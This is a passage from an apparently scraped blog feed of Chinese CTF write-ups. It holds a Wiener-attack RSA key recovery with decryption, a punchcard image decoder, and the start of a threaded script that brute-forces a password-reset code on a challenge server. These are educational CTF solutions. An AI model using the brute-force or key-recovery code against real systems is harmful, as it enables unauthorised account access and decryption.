class="number">43</span>:</span><br><span class="line"><span class="label"> 9f:</span><span class="number">2</span><span class="string">f:</span><span class="string">a4:</span><span class="number">57</span>:<span class="number">35</span>:<span class="number">57</span>:<span class="string">b2:</span><span class="number">56</span>:<span class="number">99</span>:<span class="string">ff:</span><span class="string">c1:</span><span class="number">1</span><span class="string">e:</span><span class="number">63</span>:<span class="number">1</span><span class="string">c:</span><span class="string">e8:</span></span><br><span class="line"><span class="label"> ee:</span><span class="number">97</span>:<span class="number">5</span><span class="string">a:</span><span class="number">86</span>:<span class="string">e7:</span><span class="string">e2:</span><span class="number">72</span>:<span class="string">bc:</span><span class="string">f5:</span><span class="string">f7:</span><span class="number">6</span><span class="string">a:</span><span class="number">93</span>:<span class="number">45</span>:<span class="number">03</span>:<span class="number">48</span>:</span><br><span class="line"><span class="label"> fe:</span><span class="number">3</span>f</span><br><span class="line">Modulus=<span class="number">367198</span>D6B5614E95813ADD8F22A4717BC72BE1EABD933D1B86944FDB75B8ED230BE62D7D1B69D222095C128C86F82012ECB116191FD9D018A6D02F84DB27BC51A21307DC86F4BF771C691C143E5ABE549B5BD2D6EB1A21FD6270E7E1B48FE0611FBB2E1B0B3524E6F4DE8B4E4A345DA44A13DE825B72608DB6C7C4A40B78266E6C87BBFDEF6B48381D49C4507A58BCD47B76D64B45908B158BD7EBC4DACB0B1CFD6C2C19574F40EB2EFD0E9E10DC7005CAD39BCAF52B9EAC3873368D69031C5E724684A44F068EFD1D3DC096D9B5D6411E58BDEE43E46B99A0D0494B9DB28195AF901AFF130D4A6E203DAD08DA57FA7E40262A5BADB2A323EDA28B44696AB305D</span><br><span class="line">writing RSA key</span><br><span class="line">-----BEGIN PUBLIC KEY-----</span><br><span class="line">MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAQEDZxmNa1YU6VgTrdjyKkcX</span><br><span class="line">vHK+HqvZM9G4aUT9t1uO0jC+YtfRtp0iIJXBKMhvggEuyxFhkf2dAYptAvhNsnvF</span><br><span class="line">GiEwfchvS<span class="regexp">/dxxpHBQ+Wr5Um1vS1usaIf1icOfhtI/</span>gYR+<span class="number">7</span>LhsLNSTm9N6LTko0Xa</span><br><span class="line">RKE96CW3JgjbbHxKQLeCZubIe7/e9rSDgdScRQeli81Ht21ktFkIsVi9frxNrLCx</span><br><span class="line">z9bCwZV09A6y79Dp4Q3HAFytObyvUrnqw4czaNaQMcXnJGhKRPBo79HT3Altm11k</span><br><span class="line">EeWL3uQ+RrmaDQSUudsoGVr5Aa/xMNSm4gPa0I2lf6fkAmKlutsqMj7aKLRGlqsw</span><br><span class="line">XQKCAQEA85Wdl44C658G3vPzNdj4r9dgmVHdrGC3FLbCKvD6kS8hCzQga9JKlgHH</span><br><span class="line">jfSgJ18Qf9OrVS2VBX65NOcb3c1wRcJLGFh7jI/PWt1MXYPwx3yU3JxQy+Q44rZ7</span><br><span class="line">r9MWM7aq8XgdkMOtbwPQN7MyGAGyNUbUg+Z+JgZ/eyI0fdvAwtWSzoFMv138zBQU</span><br><span class="line">N<span class="regexp">/FOCzmQ+IBh5fC65fAeP6cNsOlgXnz9V16cge/</span>uxSnDP9kDeiD9is1ROsljd2gx</span><br><span class="line">PmP5g4rjURzdCporUW8hSMjUdaNgoGNZRJc57s0lGrtCsBRXPkOfL6RXNVeyVpn/</span><br><span class="line">wR5jHOjul1qG5+JyvPX3apNFA0j+Pw==</span><br><span class="line">-----END PUBLIC KEY-----</span><br></pre></td></tr></table></figure></p>
<p>得到了n,e<br>然后用wiener_attack拆解。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> ContinuedFractions, Arithmetic</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">sys.setrecursionlimit(<span class="number">1000000</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hack_RSA</span><span class="params">(e,n)</span>:</span></span><br><span class="line"> <span class="string">'''</span><br><span class="line"> Finds d knowing (e,n)</span><br><span class="line"> applying the Wiener continued fraction attack</span><br><span class="line"> '''</span></span><br><span class="line"> frac = ContinuedFractions.rational_to_contfrac(e, n)</span><br><span class="line"> convergents = ContinuedFractions.convergents_from_contfrac(frac)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span> (k,d) <span class="keyword">in</span> convergents:</span><br><span class="line"> </span><br><span class="line"> <span class="comment">#check if d is actually the key</span></span><br><span class="line"> <span class="keyword">if</span> k!=<span class="number">0</span> <span class="keyword">and</span> (e*d-<span class="number">1</span>)%k == <span class="number">0</span>:</span><br><span class="line"> phi = (e*d-<span class="number">1</span>)//k</span><br><span class="line"> s = n - phi + <span class="number">1</span></span><br><span class="line"> <span class="comment"># check if the equation x^2 - s*x + n = 0</span></span><br><span class="line"> <span class="comment"># has integer roots</span></span><br><span class="line"> discr = s*s - <span class="number">4</span>*n</span><br><span class="line"> <span class="keyword">if</span>(discr>=<span class="number">0</span>):</span><br><span class="line"> t = Arithmetic.is_perfect_square(discr)</span><br><span class="line"> <span class="keyword">if</span> t!=-<span class="number">1</span> <span class="keyword">and</span> (s+t)%<span class="number">2</span>==<span class="number">0</span>:</span><br><span class="line"> print(<span class="string">"Hacked!"</span>)</span><br><span class="line"> <span class="keyword">return</span> d</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> e = <span class="number">0xf3959d978e02eb9f06def3f335d8f8afd7609951ddac60b714b6c22af0fa912f210b34206bd24a9601c78df4a0275f107fd3ab552d95057eb934e71bddcd7045c24b18587b8c8fcf5add4c5d83f0c77c94dc9c50cbe438e2b67bafd31633b6aaf1781d90c3ad6f03d037b3321801b23546d483e67e26067f7b22347ddbc0c2d592ce814cbf5dfccc141437f14e0b3990f88061e5f0bae5f01e3fa70db0e9605e7cfd575e9c81efeec529c33fd9037a20fd8acd513ac9637768313e63f9838ae3511cdd0a9a2b516f2148c8d475a360a06359449739eecd251abb42b014573e439f2fa4573557b25699ffc11e631ce8ee975a86e7e272bcf5f76a93450348fe3f</span></span><br><span class="line"> n = <span class="number">0x367198D6B5614E95813ADD8F22A4717BC72BE1EABD933D1B86944FDB75B8ED230BE62D7D1B69D222095C128C86F82012ECB116191FD9D018A6D02F84DB27BC51A21307DC86F4BF771C691C143E5ABE549B5BD2D6EB1A21FD6270E7E1B48FE0611FBB2E1B0B3524E6F4DE8B4E4A345DA44A13DE825B72608DB6C7C4A40B78266E6C87BBFDEF6B48381D49C4507A58BCD47B76D64B45908B158BD7EBC4DACB0B1CFD6C2C19574F40EB2EFD0E9E10DC7005CAD39BCAF52B9EAC3873368D69031C5E724684A44F068EFD1D3DC096D9B5D6411E58BDEE43E46B99A0D0494B9DB28195AF901AFF130D4A6E203DAD08DA57FA7E40262A5BADB2A323EDA28B44696AB305D</span></span><br><span class="line"> d = hack_RSA(e,n)</span><br><span class="line"> <span class="keyword">print</span> d</span><br></pre></td></tr></table></figure></p>
<p>得到<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">d</span>=4221909016509078129201801236879446760697885220928506696150646938237440992746683409881141451831939190609743447676525325543963362353923989076199470515758399</span><br></pre></td></tr></table></figure></p>
<p>这样就可以解密了<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">import binascii</span><br><span class="line"></span><br><span class="line"><span class="keyword">n</span> = 0x367198D6B5614E95813ADD8F22A4717BC72BE1EABD933D1B86944FDB75B8ED230BE62D7D1B69D222095C128C86F82012ECB116191FD9D018A6D02F84DB27BC51A21307DC86F4BF771C691C143E5ABE549B5BD2D6EB1A21FD6270E7E1B48FE0611FBB2E1B0B3524E6F4DE8B4E4A345DA44A13DE825B72608DB6C7C4A40B78266E6C87BBFDEF6B48381D49C4507A58BCD47B76D64B45908B158BD7EBC4DACB0B1CFD6C2C19574F40EB2EFD0E9E10DC7005CAD39BCAF52B9EAC3873368D69031C5E724684A44F068EFD1D3DC096D9B5D6411E58BDEE43E46B99A0D0494B9DB28195AF901AFF130D4A6E203DAD08DA57FA7E40262A5BADB2A323EDA28B44696AB305D</span><br><span class="line"><span class="keyword">d</span> = 4221909016509078129201801236879446760697885220928506696150646938237440992746683409881141451831939190609743447676525325543963362353923989076199470515758399</span><br><span class="line">c = 0x1e04304936215de8e21965cfca9c245b1a8f38339875d36779c0f123c475bc24d5eef50e7d9ff5830e80c62e8083ec55f27456c80b0ab26546b9aeb8af30e82b650690a2ed7ea407dcd094ab9c9d3d25a93b2140dcebae1814610302896e67f3ae37d108cd029fae6362ea7ac1168974c1a747ec9173799e1107e7a56d783660418ebdf6898d7037cea25867093216c2c702ef3eef71f694a6063f5f0f1179c8a2afe9898ae8dec5bb393cdffa3a52a297cd96d1ea602309ecf47cd009829b44ed3100cf6194510c53c25ca7435f60ce5f4f614cdd2c63756093b848a70aade002d6bc8f316c9e5503f32d39a56193d1d92b697b48f5aa43417631846824b5e86</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">m</span> = hex(pow(c,<span class="keyword">d</span>,<span class="keyword">n</span>)).rstrip(<span class="string">"L"</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="literal">m</span></span><br><span class="line"><span class="keyword">print</span> binascii.unhexlify(<span class="keyword">m</span>[2:])</span><br></pre></td></tr></table></figure></p>
<p>getflag!</p>
]]></content>
<summary type="html">
<![CDATA[<p>这道题是rsa的题,给了公钥,和c。<br>]]>
</summary>
<category term="bctf" scheme="http://edward-l.github.io/tags/bctf/"/>
<category term="hduisa_ctf" scheme="http://edward-l.github.io/tags/hduisa-ctf/"/>
<category term="rsa" scheme="http://edward-l.github.io/tags/rsa/"/>
<category term="sql_injection" scheme="http://edward-l.github.io/tags/sql-injection/"/>
<category term="writeup" scheme="http://edward-l.github.io/categories/writeup/"/>
</entry>
<entry>
<title><![CDATA[punchcard]]></title>
<link href="http://edward-l.github.io/2015/03/25/punchcard/"/>
<id>http://edward-l.github.io/2015/03/25/punchcard/</id>
<published>2015-03-25T07:30:16.000Z</published>
<updated>2015-03-25T06:40:44.000Z</updated>
<content type="html"><![CDATA[<p>之前bkp的一道题,有了脚本,就再也不怕看花眼了~<br><img src="http://edwardl.qiniudn.com/123.png" alt=""><br><a id="more"></a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> Image</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">START_PIXEL_X = <span class="number">17</span></span><br><span class="line">START_PIXEL_Y = <span class="number">24</span></span><br><span class="line"></span><br><span class="line">X_NEXT_PIXEL = <span class="number">7</span></span><br><span class="line">Y_NEXT_PIXEL = <span class="number">20</span></span><br><span class="line"></span><br><span class="line">TOTAL_ROWS = <span class="number">12</span></span><br><span class="line">TOTAL_COLUMNS = <span class="number">80</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_ascii</span><span class="params">(index1,index2,index3)</span>:</span></span><br><span class="line"> <span class="keyword">if</span> index1 == <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 ==<span class="number">4</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'a'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">5</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'b'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">6</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'.'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'c'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">7</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'<'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'d'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">8</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'('</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'e'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">9</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'+'</span></span><br><span class="line"> <span class="keyword">else</span> :</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'f'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">10</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'g'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'h'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">12</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'i'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'&'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 == <span class="number">2</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 == <span class="number">4</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'j'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">5</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'!'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'k'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">6</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'$'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'l'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">7</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'*'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'m'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">8</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">')'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'n'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">9</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'o'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">10</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'p'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'q'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">12</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'r'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'-'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">3</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 == <span class="number">5</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'s'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">4</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'/'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">6</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">','</span></span><br><span class="line"> <span class="keyword">else</span> :</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'t'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">7</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'%'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'u'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">8</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'v'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 ==<span class="number">9</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'>'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'w'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">10</span>:</span><br><span class="line"> <span class="keyword">if</span> index3 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'?'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'x'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'y'</span></span><br><span class="line"> <span class="keyword">elif</span> index2 == <span class="number">12</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'z'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">4</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'1'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">5</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">':'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'2'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">6</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'#'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'3'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">10</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'"'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'7'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">8</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 ==<span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'5'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 == <span class="number">9</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'='</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'6'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 ==<span class="number">7</span>:</span><br><span class="line"> <span class="keyword">if</span> index2 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'@'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'4'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 == <span class="number">11</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'8'</span></span><br><span class="line"> <span class="keyword">elif</span> index1 == <span class="number">12</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'9'</span></span><br><span class="line"><span class="comment"># elif index1 ==0:</span></span><br><span class="line"><span class="comment"># return ''</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">im = Image.open(<span class="string">'123.png'</span>)</span><br><span class="line">pix = im.load()</span><br><span class="line">rgb_im = im.convert(<span class="string">'RGB'</span>)</span><br><span class="line">r,g,b = rgb_im.getpixel((START_PIXEL_X,START_PIXEL_Y))</span><br><span class="line"><span class="comment">#stringbuilder = '!'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">1</span>,TOTAL_COLUMNS+<span class="number">1</span>):</span><br><span class="line"> bulletedindex = [<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line"> count = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> y <span class="keyword">in</span> range(<span class="number">1</span>,TOTAL_ROWS+<span class="number">1</span>):</span><br><span class="line"> r,g,b = rgb_im.getpixel((X_NEXT_PIXEL*x+<span class="number">10</span>,Y_NEXT_PIXEL *y+<span class="number">4</span>))</span><br><span class="line"> <span class="keyword">if</span> r == <span class="number">20</span> <span class="keyword">and</span> g ==<span class="number">20</span> <span class="keyword">and</span> b ==<span class="number">20</span>:</span><br><span class="line"> bulletedindex[count] = y</span><br><span class="line"> count = count +<span class="number">1</span></span><br><span class="line"><span class="comment"># stringbuilder = stringbuilder + get_ascii(bulletedindex[0],bulletedindex[1],bulletedindex[2]) </span></span><br><span class="line"> <span class="keyword">print</span> get_ascii(bulletedindex[<span class="number">0</span>],bulletedindex[<span class="number">1</span>],bulletedindex[<span class="number">2</span>]) </span><br><span class="line"><span class="comment">#print stringbuilder</span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<![CDATA[<p>之前bkp的一道题,有了脚本,就再也不怕看花眼了~<br><img src="http://edwardl.qiniudn.com/123.png" alt=""><br>]]>
</summary>
<category term="PIL" scheme="http://edward-l.github.io/tags/PIL/"/>
<category term="bkpctf" scheme="http://edward-l.github.io/tags/bkpctf/"/>
<category term="punchcard" scheme="http://edward-l.github.io/tags/punchcard/"/>
<category term="python" scheme="http://edward-l.github.io/tags/python/"/>
<category term="python" scheme="http://edward-l.github.io/categories/python/"/>
</entry>
<entry>
<title><![CDATA[hduisa_ctf_week5_writeup]]></title>
<link href="http://edward-l.github.io/2015/03/16/hduisa_ctf_week5_writeup/"/>
<id>http://edward-l.github.io/2015/03/16/hduisa_ctf_week5_writeup/</id>
<published>2015-03-16T02:30:16.000Z</published>
<updated>2015-03-24T15:51:46.000Z</updated>
<content type="html"><![CDATA[<h3 id="Problem_ID:17">Problem ID:17</h3><h3 id="EasyUser">EasyUser</h3><p>一看就是一个爆破验证码的题目,然后就开始写脚本<br><a id="more"></a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib </span><br><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="keyword">import</span> re </span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(x,y)</span>:</span></span><br><span class="line"> <span class="keyword">global</span> flag</span><br><span class="line"> <span class="keyword">if</span> flag == <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(x,y):</span><br><span class="line"> url = <span class="string">'http://104.236.171.163/week5/easyuser/forget.php'</span> </span><br><span class="line"> values = {<span class="string">'number'</span> : i} </span><br><span class="line"> data = urllib.urlencode(values) </span><br><span class="line"> req = urllib2.Request(url, data) </span><br><span class="line"> response = urllib2.urlopen(req)</span><br><span class="line"> html = response.read()</span><br><span class="line"> <span class="comment"># print html</span></span><br><span class="line"> match = re.match(<span class="string">r'.*10.*'</span>, html, re.S)</span><br><span class="line"> <span class="keyword">if</span> match:</span><br><span class="line"> <span class="keyword">print</span> <span 